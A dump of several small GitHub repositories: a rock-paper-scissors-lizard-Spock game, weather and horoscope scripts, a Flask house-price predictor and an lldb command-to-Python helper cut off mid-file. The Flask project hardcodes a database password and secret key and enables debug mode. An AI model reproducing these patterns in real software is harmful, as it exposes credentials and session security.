e381c7f8d7f36adf687c85829afff5acae100e9f
1bc8b1dd4ac53cdc3fc5df019f6115581f6bcff1
refs/heads/master
2021-01-10T08:54:14.076997
2015-06-05T20:55:40
2015-06-05T20:55:40
36,568,236
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5600558519363403, "alphanum_fraction": 0.5761173367500305, "avg_line_length": 20.37313461303711, "blob_id": "6570d8c5628c371f94143a29d85ef539c3fd4cb8", "content_id": "da86d4b5715455e91b94cea3c100aab75201a52e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "no_license", "max_line_length": 54, "num_lines": 67, "path": "/rpsls/RPSLS.py", "repo_name": "jandersson/Coursera_IIPP", "src_encoding": "UTF-8", "text": "__author__ = 'Jonas'\n##Assignment 1\n\n##Name to number assignments\n#0 rock\n#1 Spock\n#2 paper\n#3 lizard\n#4 scissors\n\nimport random\n\ndef name_to_number(name):\n '''\n Takes a name and returns a corresponding number\n '''\n if name == 'rock':\n return 0\n if name == 'Spock':\n return 1\n if name == 'paper':\n return 2\n if name == 'lizard':\n return 3\n if name == 'scissors':\n return 4\n else:\n print 'Thats an invalid choice!'\n\ndef number_to_name(number):\n '''\n Takes a number and returns its corresponding name.\n '''\n if number == 0:\n return 'rock'\n elif number == 1:\n return 'Spock'\n elif number == 2:\n return 'paper'\n elif number == 3:\n return 'lizard'\n elif number == 4:\n return 'scissors'\n else:\n print 'Invalid number!'\n\ndef rpsls(player_choice):\n print \"\\nPlayer chooses\", player_choice\n player_number = name_to_number(player_choice)\n comp_number = random.randrange(0,5)\n comp_name = number_to_name(comp_number)\n print \"Computer chooses\", comp_name\n diff = (player_number - comp_number) % 5\n if diff == 0:\n print 'Player and computer tie!'\n elif diff == 1:\n print 'Player wins!'\n elif diff == 2:\n print 'Player wins!'\n elif diff > 2:\n print 'Computer wins!'\n\nrpsls('rock')\nrpsls('Spock')\nrpsls('paper')\nrpsls('lizard')\nrpsls('scissors')\n" }, { "alpha_fraction": 0.8484848737716675, "alphanum_fraction": 0.8484848737716675, "avg_line_length": 32, "blob_id": "d0ca5059a9e029e9674e22ea13970df9099017c0", "content_id": "0274736c7f28f37d4a161a79490d541ea44c39d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 66, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/README.md", "repo_name": "jandersson/Coursera_IIPP", "src_encoding": "UTF-8", "text": "# Coursera_IIPP\nIntroduction to Interactive Programming in Python\n" } ]
2
Keerthanalaxmi/Pythonbasics
https://github.com/Keerthanalaxmi/Pythonbasics
76afaca8a3efa34ac4e057b8c67fd70d96a92fcf
e2f6ff946066b3d55a9bda86f46dbc1d51e74c1d
e9bf2b0406a31afeee02d98113e5f5fe70390189
refs/heads/master
2020-04-30T20:33:19.198469
2019-06-01T08:01:27
2019-06-01T08:01:27
177,070,120
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6829745769500732, "alphanum_fraction": 0.7005870938301086, "avg_line_length": 41.58333206176758, "blob_id": "8fb35d19bbdc7fd7f49d5d94b6dda370e3b9d68f", "content_id": "e95a68fecdc46a3553597d120ba7d5f0d488cc56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 511, "license_type": "no_license", "max_line_length": 78, "num_lines": 12, "path": "/Weather.py", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport urllib.request\nimport json\nresponse = urllib.request.urlopen('https://ipinfo.io/')\nout=json.load(response)\ncity_name=out['city']\nwith open('apikey','r') as f: api_key=f.readline().split('\\n')[0]\nbase_url='http://api.openweathermap.org/data/2.5/weather?'+'appid=%s' %api_key\nresponse = urllib.request.urlopen('%s&q=%s' %(base_url,city_name))\njson_data=json.load(response)\nprint('City Name is %s' %(city_name))\nprint(\"Temperature is {0:.2f}\".format(json_data['main']['temp']-273))\n" }, { "alpha_fraction": 0.7261146306991577, "alphanum_fraction": 0.7346072196960449, "avg_line_length": 32.5, "blob_id": "bb310b5ff327d0fb0bf58960dd947b8c4005575d", "content_id": "bab48489afae1f08bba0d58d7ef66b2b16a4b578", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 471, "license_type": "no_license", "max_line_length": 165, "num_lines": 14, "path": "/README.md", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "# Pythonbasics\nBasic Python examples\n\n1. Hangman_game.py :\n This is a game to predict the words by guessting a character at a time. The program takes the number of incorrect attempts and minimum length of word as input.\n \n2. Weather.py :\n Predicting the weather based on the location \n\n3. youtube_download_extract_info:\n Download/Extract information of a youtube file\n\n4. Get daily Horoscope:\n This program will get horoscope of your sunsign\n\n\n" }, { "alpha_fraction": 0.6700167655944824, "alphanum_fraction": 0.6783919334411621, "avg_line_length": 32, "blob_id": "06bdc25695f0da34c334591b2855ff414ac66fee", "content_id": "1eefbe985a7d6a9a05144c7335464fea25e87728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 54, "num_lines": 18, "path": "/get_daily_horoscope.py", "repo_name": "Keerthanalaxmi/Pythonbasics", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport re\ndef daily_horoscope(sunsign):\n\turl = \"http://www.ganeshaspeaks.com/\" + sunsign + \\\n\t\"/\" + sunsign + \"-daily-horoscope.action\"\n\tcontent=urllib.request.urlopen(url)\n\tsoup=BeautifulSoup(content.read(),'html.parser')\n\traw_data=str(soup.find_all('p')[1])\n\tdate=re.search('[\\d]+-[\\d]+-[\\d]+',raw_data).group(0)\n\thoro=soup.find_all('p')[2].get_text()\n\tprint('The date is %s' %date)\n\tprint('The horoscope is %s' %horo)\n\nif __name__=='__main__':\n\tsunsign=input('Please enter the sunsign:')\n\tdaily_horoscope(sunsign)\n\t\n\n" } ]
3
elizabethtweedale/SuperSkill-9-Architecture
https://github.com/elizabethtweedale/SuperSkill-9-Architecture
57d6a0f7b36ee885d496687e71dd29f6e87c5bb2
77c863bc9f10d485a2aa9250685398757589bc55
85a13395057eeff653ca8d220882f44ae5f115f1
refs/heads/master
2020-05-23T10:44:51.776644
2017-03-12T22:43:13
2017-03-12T22:43:13
84,762,910
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.43838194012641907, "alphanum_fraction": 0.4454374313354492, "avg_line_length": 79.2264175415039, "blob_id": "71ff9b035694d9ccbea46d51a6f64fc14cccaf77", "content_id": "ee68ee99e07b02f1f718961a47554f3a8abc6d24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4252, "license_type": "no_license", "max_line_length": 143, "num_lines": 53, "path": "/Skyscraper-2.py", "repo_name": "elizabethtweedale/SuperSkill-9-Architecture", "src_encoding": "UTF-8", "text": "# Skyscraper Project - 2- Scales + Button - Python Code - Elizabeth Tweedale\nfrom tkinter import *\n\ndef newSkyscraper():\n winW = scaleWinW.get() # Get the number of windows wide from the scale\n winH = scaleWinH.get() # Get the number of windows high from the scale\n w = scaleW.get() # Get the width of the windows from the scale\n h = scaleH.get() # Get the height of the windows from the scale\n gap = scaleGap.get() # Get the window gap from the scale\n \n myBuilding.delete(\"all\") # This will clear the drawing before drawing new squares\n\n # Draw main building\n myBuilding.create_rectangle(gap,gap,(winW+2)*gap+winW*w,(winH+2)*gap+winH*h, # startX(left),starty(top),finishX(right),finishY(bottom)\n outline=\"gray\", fill=\"gray\") # outline and fill colours\n # Draw windows\n for i in range(winW):\n for j in range(winH):\n myBuilding.create_rectangle(((w+gap)*i+2*gap), # startX(left)\n ((h+gap)*j+2*gap), # startY(top)\n ((w+gap)*i+(2*gap+w)), # finsihX(right)\n ((h+gap)*j+(2*gap+h)), # finishY(bottom)\n outline=\"black\",fill=\"white\") # outline, fill colours\n # Try using different colours such as \"blue\" or \"red\"\n myBuilding.pack(fill=BOTH, expand=1) # Add ALL of the rectangles to your Canvas\n \n\"\"\" Main Program \"\"\"\nroot = Tk() # Set up Tkinter\nmyBuilding = Canvas(root, width=500, height=500) # Set up Canvas\nroot.title(\"Skyscraper\") # Set the title of your screen\nmyBuilding.pack() # Pack adds everything to the Tkinter Canvas\n\n\"\"\" Draw Scales \"\"\"\nscaleWinW = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Windows Wide\") # Create a scale for the number of windows wide\nscaleWinW.pack() # Add it to the Canvas\n# HINT - you can copy the above two lines for the next 4 scales and simply change the variable names - think of it like \"SPOT THE DIFFERENCE\"\nscaleWinH = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Windows High\") # Create a scale for the number of windows high\nscaleWinH.pack() # Add it to the Canvas\n\nscaleW = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Window Width\") # Create a scale for the windows' width\nscaleW.pack() # Add it to the Canvas\n\nscaleH = Scale(root, from_=5, to=30, orient=HORIZONTAL, label= \"Window Height\") # Create a scale for the windows' height\nscaleH.pack() # Add it to the Canvas\n\nscaleGap = Scale(root, from_=2, to=20, orient=HORIZONTAL, label= \"Window Gap\") # Create a scale for the size of the gap between windows...\nscaleGap.pack() # Did you notice the smaller numbers for the from_ and to?\n\n\"\"\" Draw Button \"\"\"\nbutton = Button(root, text=\"Draw Skyscraper\", command=newSkyscraper) # Create a button to draw the skyscraper\nbutton.pack() # Add it to the Canvas\n\nroot.mainloop() # start the main loop\n" } ]
1
rodrigocarlos2/GenerateSequency
https://github.com/rodrigocarlos2/GenerateSequency
74bf75d48534d6f59775fb23e413d40b1f7c58d5
0f11ce573cc7df4eb9c8e347bf5928b52897173c
b8fb528c032b4460447dade1f95e898be4333231
refs/heads/master
2021-03-27T15:32:26.788312
2017-07-13T18:01:40
2017-07-13T18:01:40
97,151,339
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5520833134651184, "alphanum_fraction": 0.5885416865348816, "avg_line_length": 11.733333587646484, "blob_id": "d1b0394b88e911d5e21b86cad70c68d7634efa82", "content_id": "58be40a077490efcbc9f26c92654b19569d59fec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 192, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/Source.py", "repo_name": "rodrigocarlos2/GenerateSequency", "src_encoding": "UTF-8", "text": "\na1 = input('Write the first element: ')\n\na1 = int(a1)\n\nan = input('Write the last element: ')\n\nan = int(an)\n\nr = input ('Write the reason: ')\n\nr = int(r)\n\nwhile a1<=an:\n\tprint(a1)\n\ta1 = a1+r\n" } ]
1
alemhar/sftp_download-google_storage_upload
https://github.com/alemhar/sftp_download-google_storage_upload
400fccd7af2b40af18270c2189371591149a3f86
11a1ec345574f5e13d3645abfef00ea43bdd5e95
3c69254151cd6e765e813ebadca42f3a590ac535
refs/heads/main
2023-05-07T11:50:55.378452
2021-05-24T14:24:29
2021-05-24T14:24:29
370,379,013
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.652830183506012, "alphanum_fraction": 0.652830183506012, "avg_line_length": 27.106060028076172, "blob_id": "c569bb5bc3105d2020f182b74bb6e47ebe1e90e6", "content_id": "f6b3a8709f398e738692799db40200635cb82a39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1855, "license_type": "no_license", "max_line_length": 109, "num_lines": 66, "path": "/energylink.py", "repo_name": "alemhar/sftp_download-google_storage_upload", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport pysftp\nimport shutil\nfrom google.cloud import storage\ncnopts = pysftp.CnOpts()\ncnopts.hostkeys = None\n\n\nproject_id = 'project-id'\n\n\nsftp_username = 'username'\nsftp_userpass = 'password'\nsftp_server = \"ftp.server.com\"\nremote_path = \"file_directory\"\nlocal_path = \"c:/local/file/directory\"\n\nclient = storage.Client(project=project_id)\nbucket = client.get_bucket('google_bucket')\nblobs = client.list_blobs('google_bucket',prefix='sub_directory/', delimiter='/')\n\n\n# Get list of current \nbucket_files = []\nfor blob in blobs:\n bucket_file =blob.name.replace('sub_directory/','') \n if bucket_file:\n bucket_files.append(bucket_file)\n\n\n\nwith pysftp.Connection(host=sftp_server, username=sftp_username, password=sftp_userpass, cnopts=cnopts) as sftp:\n print(\"Connection succesfully stablished ... \")\n\n # Switch to a remote directory\n sftp.cwd(remote_path)\n\n # Obtain structure of the remote directory \n directory_structure = sftp.listdir_attr()\n\n for attr in directory_structure:\n if attr.filename in bucket_files:\n print ('Skip download, file exist: ' + attr.filename)\n \n else:\n print ('Downloading: ' + attr.filename)\n sftp.get('/' + remote_path + '/' + attr.filename, local_path + '/' + attr.filename)\n\n\n# loop in local download directory\nfor root, dirs, files in os.walk(local_path): \n for basename in files:\n # copy file to bucket \n # move file to archive folder\n # delete file from download folder\n \n\n blob = bucket.blob('xls/' + basename)\n blob.upload_from_filename('c:/local/file/directory/' + basename)\n\n file_des = 'c:/local/file/archive/' + basename \n file_src = 'c:/local/file/directory/' + basename\n shutil.move(file_src, file_des)\n \nprint ('Completed.')\n" } ]
1
Vivvianne/Pitch
https://github.com/Vivvianne/Pitch
e0d91f7a97ad3a1ea4798ae14862347a5b5ab20b
e13a96252f7b83995c4849a3bd142c68df7921c8
864893bfbc6068448e4b791cce06ffe8dc646a99
refs/heads/master
2023-02-05T18:23:55.426285
2019-07-02T10:04:20
2019-07-02T10:04:20
194,226,961
0
0
MIT
2019-06-28T07:19:02
2019-07-02T10:04:23
2023-02-02T06:32:57
Python
[ { "alpha_fraction": 0.7318965792655945, "alphanum_fraction": 0.7370689511299133, "avg_line_length": 35.82539749145508, "blob_id": "559c07ecf4fff7ee92479e37bb17d55354487425", "content_id": "07387b59f9bd83e3b46710d16e9fcc6801aef47d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2320, "license_type": "permissive", "max_line_length": 297, "num_lines": 63, "path": "/README.md", "repo_name": "Vivvianne/Pitch", "src_encoding": "UTF-8", "text": "# A minute pitch App\n\nAuthor: Vivvianne Kimani\n\n## Description\n\nThis is a web application that allows various users to submit a short pitch. Users can also be able to view other pitches from different categories (Pick-up Lines, Interview Pitches, Product Pitches, Promotion Pitches), comment and vote. For a user to do any of that, they need to have registered.\n\n##User Stories\n\n* As a user I would like to view the different categories.\n* As a user I would like to see the pitches other people have posted.\n* As a user I would like to comment on the different pitches and leave feedback.\n* As a user I would like to submit a pitch in any category.\n* As a user I would like to vote on the pitch they liked and give it a downvote or upvote.\n\n## BDD\n\n| Behavior | Input | Output |\n|:---------|-------|--------|\n|signup/login field| Input credentials | A welcoming message |\n| Display Various Pitch Categories | N/A | Various pitches grouped by category are displayed |\n| Add category | Input a category | Inputed category dispalyed |\n| Add new pitch | Click New pitch | New pitch added |\n| Display pitches | Click on a Category | A page with a list of pitches from the selected category |\n| View Pitches | Click on a pitch | View a pitch and comments |\n| Comment on a pitch | Click Comment | Registered User displays a form where a user can comment on a certain pitch |\n\n## Prerequisites\n* Python3.6\n* Flask\n* Postgresql\n\n## Setup/Installation Requirements\n* Internet access\n* $ git clone https://github.com/kepha-okari/one-minute-pitch.git\n* $ cd one-minute-pitch\n* $ python3.6 -m venv virtual (install virtual environment)\n* $ source virtual/bin/activate\n* $ python3.6 -m pip install -r requirements.txt (install all dependencies)\n* Inside the manage.py module change the config_name parameter from 'production' to 'development' ie app = create_app('production') should be app = create_app('development')\n* $ ./start.sh\n\n## How the app works\nA user needs to sign up\nA user the needs to sign in to vote and post pitches\n\n## Live link\nYou can view the project from here https://pitchput.herokuapp.com/\n\n## Contacts\nFor further questions you can send an email to [email protected]\n\n## Technologies used \n\n* Python3.6\n* Flask framework\n* Bootstrap\n* PostgreSQL\n\n## License\n\nMIT (c) 2019 https://github.com/Vivvianne/Pitch/blob/master/LICENSE\n" }, { "alpha_fraction": 0.6315192580223083, "alphanum_fraction": 0.658730149269104, "avg_line_length": 25.727272033691406, "blob_id": "e73c7706429ef30ad54a74ac7d65ef36e69d94ff", "content_id": "c626f5429dc6e3b7cf62c94b290683a33746bcb3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 882, "license_type": "permissive", "max_line_length": 98, "num_lines": 33, "path": "/config.py", "repo_name": "Vivvianne/Pitch", "src_encoding": "UTF-8", "text": "import os\n\nclass Config:\n \n SQLACHEMY_TRACK_MODIFICATIONS = False\n #SQLALCHEMY_DATABASE_MODIFICATIONS = 'postgresql+psycopg2://nkimani:her1234\\q@localhost/pitch'\n \n SECRET_KEY = 'Im not boarding'\n MAIL_SERVER = 'smtp.gmail.com'\n MAIL_PORT = 587\n MAIL_USE_TLS = True\n MAIL_USERNAME = os.environ.get(\"MAIL_USERNAME\")\n MAIL_PASSWORD = os.environ.get(\"MAIL_PASSWORD\")\n \nclass ProdConfig(Config):\n \n SQLALCHEMY_DATABASE_URI = os.environ.get(\"DATABASE_URL\")\n \n \nclass DevConfig(Config):\n \n SQLALCHEMY_DATABASE_URI='postgresql+psycopg2://nkimani:[email protected]/try'\n DEBUG = True\n \n#class TestConfig(Config):\n #SQLALCHEMY_DATABASE_URI = 'postgresql+psycopg2://nkimani:her1234@localhost/pitch'\n \n \nconfig_options = {\n 'development': DevConfig,\n 'production': ProdConfig,\n #'test':TestConfig\n}\n" } ]
2
Ghaffaru15/house-price-prediction
https://github.com/Ghaffaru15/house-price-prediction
31d51088c0b07d6dd31e528577e02e3d26b4cdf0
145df3459ec721f12d611b39a6e3703471dbe0b9
97bc2e316f5f0e74d0481adec16b62977efaf8f1
refs/heads/master
2020-07-06T14:00:08.359013
2019-10-17T14:47:10
2019-10-17T14:47:10
203,040,732
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6049478054046631, "alphanum_fraction": 0.6466950178146362, "avg_line_length": 10.346490859985352, "blob_id": "347ff3b8fa0133bba9933374fa91c7c7d6c2659e", "content_id": "9eec6e1f2d5de602aaf352f42258d79c7548e5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2587, "license_type": "no_license", "max_line_length": 124, "num_lines": 228, "path": "/model.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Predicting the price of a house\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\n\n# In[2]:\n\n\nhouse = pd.read_csv('home_data.csv')\n\n\n# In[3]:\n\n\nhouse.head()\n\n\n# In[4]:\n\n\nhouse.tail()\n\n\n# In[5]:\n\n\nhouse.info()\n\n\n# In[6]:\n\n\nhouse.describe()\n\n\n# In[7]:\n\n\nplt.figure(figsize=(10,6))\nplt.scatter(house.sqft_living,house.price)\nplt.xlabel('Sqft')\nplt.ylabel('Price')\n\n\n# In[8]:\n\n\n#getting line of best fit\nsns.lmplot('sqft_living','price', data=house)\n\n\n# In[9]:\n\n\nsns.heatmap(house.corr())\n\n\n# In[10]:\n\n\nsns.distplot(house.price, color='red')\n\n\n# In[11]:\n\n\nhouse.info()\n\n\n# In[12]:\n\n\nfeatures = house[['bedrooms','bathrooms','sqft_living','sqft_lot','floors','sqft_above','sqft_lot15','yr_built','condition',\n 'zipcode']]\n\nlabels = house['price']\n\n\n# In[13]:\n\n\nfrom sklearn.model_selection import train_test_split\n\n\n# In[14]:\n\n\n#training and testing, 75% for training, 25\nfeatures_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=0.1, random_state=7)\n\n\n# In[15]:\n\n\n#verify size of feature training set\n\nprint (features_train.shape)\n\n\n# In[16]:\n\n\n#verify size of label training set\nprint(labels_train.shape)\n\n\n# In[17]:\n\n\nprint(features_test.shape)\n\n\n# In[18]:\n\n\nprint(labels_test.shape)\n\n\n# In[19]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[20]:\n\n\nmodel = LinearRegression()\n\n\n# In[21]:\n\n\nmodel.fit(features_train,labels_train)\n\n\n# In[22]:\n\n\nprediction = model.predict(features_test)\n\n\n# In[34]:\n\n\nmodel.predict(features_test)[1]\n\n\n# In[32]:\n\n\nfeatures_test\n\n\n# In[43]:\n\n\nlabel_actual = pd.DataFrame(labels_test)\n\n\n# In[46]:\n\n\nlabel_actual.price\n# print(labels_test)\n\n\n# In[38]:\n\n\nmodel.predict([features_test.loc[12640]])\n\n\n# In[40]:\n\n\nfrom sklearn.metrics import mean_squared_error\n\n\n# In[52]:\n\n\nlabels_test\n\n\n# In[56]:\n\n\nfrom math import sqrt\nsqrt(mean_squared_error(labels_test, model.predict(features_test)))\n\n\n# In[54]\ntest_predict = pd.DataFrame({\n \"bedrooms\" : 5,\n \"bathrooms\" : 2,\n \"sqft_living\" : 1000,\n \"sqft_lot\" : 20456,\n \"floors\" : 2.0,\n \"sqft_above\" : 1480,\n \"sqft_lot15\" : 6005,\n \"yr_built\" : 1996,\n \"condition\" : 4,\n \"zipcode\" : 98064\n},index=[0])\n\n# print(str(model.predict(test_predict)).strip('[]'))\n\n#save the model\n#serialize model to json\n# model_json = model.to_json()\n# with open('model.json','w') as json_file:\n# json_file.write(model_json)\n\n# #save weights to HDF5\n# model.save_weights('model.h5')\n\nfrom joblib import dump, load\ndump(model,'model.joblib')\n" }, { "alpha_fraction": 0.7329608798027039, "alphanum_fraction": 0.7374301552772522, "avg_line_length": 51.70588302612305, "blob_id": "9e48f237b01d625ef4baec25d9e658133b823de6", "content_id": "c345ba24d475d022bb0181d0a03ac63817e62370", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 895, "license_type": "no_license", "max_line_length": 74, "num_lines": 17, "path": "/form.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "from flask_wtf import FlaskForm\nfrom wtforms import IntegerField, SubmitField\nfrom wtforms.validators import DataRequired\n\n\nclass PredictionForm(FlaskForm):\n bedrooms = IntegerField('Bedrooms', validators=[DataRequired()])\n bathrooms = IntegerField('Bathrooms', validators=[DataRequired()])\n sqft_living = IntegerField('Sqtf living', validators=[DataRequired()])\n sqft_lot = IntegerField('Sqft lot', validators=[DataRequired()])\n floors = IntegerField('Floors', validators=[DataRequired()])\n sqft_above = IntegerField('Sqft above', validators=[DataRequired()])\n sqft_lot15 = IntegerField('Sqft lot15', validators=[DataRequired()])\n yr_built = IntegerField('Yr built', validators=[DataRequired()])\n condition = IntegerField('Condition', validators=[DataRequired()])\n zipcode = IntegerField('Zip code', validators=[DataRequired()])\n submit = SubmitField('Predict')" }, { "alpha_fraction": 0.6359223127365112, "alphanum_fraction": 0.6548004150390625, "avg_line_length": 31.526315689086914, "blob_id": "6cf883b234b0d3404be80b3b9460aeb75481b2d6", "content_id": "68d77a8cf72175b19048a001c2d2e558660ffcb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1854, "license_type": "no_license", "max_line_length": 99, "num_lines": 57, "path": "/app.py", "repo_name": "Ghaffaru15/house-price-prediction", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, request, url_for, flash, redirect, jsonify\nfrom form import PredictionForm\nimport pandas as pd\nimport numpy as np\nimport joblib\nimport json\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = '15d1a4704a23a032d3695927a8e3dff5'\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef home():\n form = PredictionForm()\n if form.validate_on_submit():\n data = [form.bedrooms.data, form.bathrooms.data, form.sqft_living.data, form.sqft_lot.data,\n form.floors.data, form.sqft_above.data, form.sqft_lot15.data, form.yr_built.data,\n form.condition.data, form.zipcode.data]\n model = joblib.load('model.joblib')\n result = model.predict([data])\n actual_result = str(result).strip('[]')\n flash('Predicted Price: $' + actual_result, 'success')\n return redirect(url_for('home'))\n return render_template('index.html', form=form)\n\n\[email protected]('/api/predict', methods=['POST'])\ndef predict():\n bedrooms = request.json['bedrooms']\n bathrooms = request.json['bathrooms']\n sqft_living = request.json['sqft_living']\n sqft_lot = request.json['sqft_lot']\n floors = request.json['floors']\n sqft_above = request.json['sqft_above']\n sqft_lot15 = request.json['sqft_lot15']\n yr_built = request.json['yr_built']\n condition = request.json['condition']\n zipcode = request.json['zipcode']\n\n data = [bedrooms,bathrooms,sqft_living,sqft_lot,floors,sqft_above,sqft_lot15,yr_built,\n condition,zipcode]\n\n model = joblib.load('model.joblib')\n result = model.predict([data])\n actual_result = str(result).strip('[]')\n\n return jsonify({'predicted': actual_result})\n\n\[email protected]('/pred', methods=['POST'])\ndef dummy():\n\n return jsonify({'test': request.json})\n\nif __name__ == \"__main__\":\n app.run(debug=True, port=36174)\n" } ]
3
kastiglione/lldb-topython
https://github.com/kastiglione/lldb-topython
a81831358779c74ea4c9465e05e553e97ed61eec
2e684e21612eede9f3244875f78ba371598f7eba
a0beb1012c5980c2da886e55fd9a9c16be8f6b8b
refs/heads/master
2020-03-20T12:57:38.319719
2018-06-15T06:41:45
2018-06-15T06:41:45
137,444,948
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7577399611473083, "alphanum_fraction": 0.7616099119186401, "avg_line_length": 31.299999237060547, "blob_id": "fc14623c717f000955f94968277c0794d64d5db4", "content_id": "844d500c1a1db12fde0d5343aa2e43d41b547ae4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1292, "license_type": "permissive", "max_line_length": 101, "num_lines": 40, "path": "/README.md", "repo_name": "kastiglione/lldb-topython", "src_encoding": "UTF-8", "text": "# lldb-topython\n\n#### Examples\n\n```\n(lldb) topython po\nHelp on method EvaluateExpression in lldb.SBFrame:\n\nlldb.SBFrame.EvaluateExpression = EvaluateExpression(self, *args) unbound lldb.SBFrame method\n EvaluateExpression(self, str expr) -> SBValue\n EvaluateExpression(self, str expr, DynamicValueType use_dynamic) -> SBValue\n EvaluateExpression(self, str expr, DynamicValueType use_dynamic, bool unwind_on_error) -> SBValue\n EvaluateExpression(self, str expr, SBExpressionOptions options) -> SBValue\n \n The version that doesn't supply a 'use_dynamic' value will use the\n target's default.\n```\n\n```\n(lldb) topython break mod -i 0 --enable\nHelp on method SetIgnoreCount in lldb.SBBreakpoint:\n\nlldb.SBBreakpoint.SetIgnoreCount = SetIgnoreCount(self, *args) unbound lldb.SBBreakpoint method\n SetIgnoreCount(self, uint32_t count)\n\nHelp on method SetEnabled in lldb.SBBreakpoint:\n\nlldb.SBBreakpoint.SetEnabled = SetEnabled(self, *args) unbound lldb.SBBreakpoint method\n SetEnabled(self, bool enable)\n\nlldb.SBBreakpoint.SetEnabled(True)\n```\n\n```\n(lldb) topython thread jump\nHelp on method JumpToLine in lldb.SBThread:\n\nlldb.SBThread.JumpToLine = JumpToLine(self, *args) unbound lldb.SBThread method\n JumpToLine(self, SBFileSpec file_spec, uint32_t line) -> SBError\n```\n" }, { "alpha_fraction": 0.6486080884933472, "alphanum_fraction": 0.6490174531936646, "avg_line_length": 33.08372116088867, "blob_id": "733fa3b859f42cb045fbd94d1fbfa9c70f60e49d", "content_id": "7f239e43237eba033e20eea4446ff2a300f07985", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7328, "license_type": "permissive", "max_line_length": 96, "num_lines": 215, "path": "/topython.py", "repo_name": "kastiglione/lldb-topython", "src_encoding": "UTF-8", "text": "import lldb\nimport re\nimport argparse\nimport shlex\n\n# `topython` translates LLDB commands to Python API. The translation happens\n# using the following dictionaries.\n\n# The `CommandAPIs` dictionary translates full commands to one or more Python\n# APIs. Before this can be used, any given command must first be expanded using\n# `ResolveCommand()`, which turns aliases (`po`) and abbreviations (`br s`) to\n# canonical full commands.\nCommandAPIs = {\n ### Thread Commands\n \"thread step-over\": [\"lldb.SBThread.StepOver\"],\n \"thread step-in\": [\"lldb.SBThread.StepInto\"],\n \"thread step-inst\": [\"lldb.SBThread.StepInstruction(False)\"],\n \"thread step-inst-over\": [\"lldb.SBThread.StepInstruction(True)\"], # TODO: Document parameter\n \"thread return\": [\"lldb.SBThread.ReturnFromFrame(SBFrame, SBValue)\"],\n \"thread jump\": [\"lldb.SBThread.JumpToLine\", \"lldb.SBFrame.SetPC\"], # TODO: Jump to address\n \"thread until\": [\"lldb.SBThread.StepOverUntil\"],\n\n ### Process Commands\n \"process continue\": [\"lldb.SBProcess.Continue\"],\n\n ### Expression Command\n \"expression\": [\n \"lldb.SBFrame.EvaluateExpression\",\n \"lldb.SBTarget.EvaluateExpression\",\n # \"lldb.SBExpressionOptions\",\n ],\n\n ### Frame Commands\n \"frame variable\": [\n \"lldb.SBFrame.GetVariables\",\n \"lldb.SBFrame.FindVariable\",\n ],\n # \"frame info\": [],\n\n ### Breakpoint Commands\n \"breakpoint set\": [\n \"lldb.SBTarget.BreakpointCreateByAddress\",\n \"lldb.SBTarget.BreakpointCreateByLocation\",\n \"lldb.SBTarget.BreakpointCreateByName\",\n \"lldb.SBTarget.BreakpointCreateByNames\",\n \"lldb.SBTarget.BreakpointCreateByRegex\",\n \"lldb.SBTarget.BreakpointCreateBySBAddress\",\n \"lldb.SBTarget.BreakpointCreateBySourceRegex\",\n ],\n # \"breakpoint clear\": ...,\n \"breakpoint command\": [\n \"lldb.SBBreakpoint.SetCommandLineCommands\",\n \"lldb.SBBreakpoint.SetScriptCallbackBody\",\n \"lldb.SBBreakpoint.SetScriptCallbackFunction\",\n ],\n \"breakpoint delete\": [\n \"lldb.SBTarget.DeleteAllBreakpoints\",\n \"lldb.SBTarget.BreakpointDelete\",\n ],\n \"breakpoint disable\": [\n \"lldb.SBTarget.DisableAllBreakpoints\",\n 